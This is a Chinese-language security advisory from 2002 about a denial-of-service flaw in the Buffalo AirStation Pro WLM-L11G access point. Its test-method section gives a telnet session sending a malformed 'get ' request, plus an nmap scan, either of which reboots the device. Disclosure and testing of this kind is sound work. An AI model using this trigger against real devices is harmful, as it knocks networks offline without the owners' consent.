发布日期：2002-11-13
更新日期：2002-11-20

受影响系统：

Buffalo Technology AirStation Pro Intelligent Access Point WLM-L11G

描述：

---

BUGTRAQ  ID: 6177

Buffalo AirStation Pro Intelligent Access Point是无线访问接入设备。

Buffalo AP对特殊畸形HTTP GET请求处理不正确，远程攻击者可以利用这个漏洞进行拒绝服务攻击。

使用Nmap对Buffalo AP进行扫描，或者手工连接AP 80端口，并提交畸形GET请求，如在GET后加空格的请求，可导致Buffalo AP重新启动，停止对正常通信进行应答。

<*来源：Andrei Mikhailovsky （andrei@arhont.com）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=103724086223296&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Andrei Mikhailovsky （andrei@arhont.com）提供了如下测试方法：

andrei@192.168.177.7:~$ telnet 192.168.177.250 80
Trying 192.168.177.250...
Connected to 192.168.177.250 (192.168.177.250).
Escape character is '^]'.
get

get后有空格。或者使用如下Nmap扫描:

$ nmap -sVVV -p 80 192.168.177.250

建议：

---

厂商补丁：

Buffalo Technology
------------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.buffalotech.com

浏览次数：2915
严重程度：0（网友投票）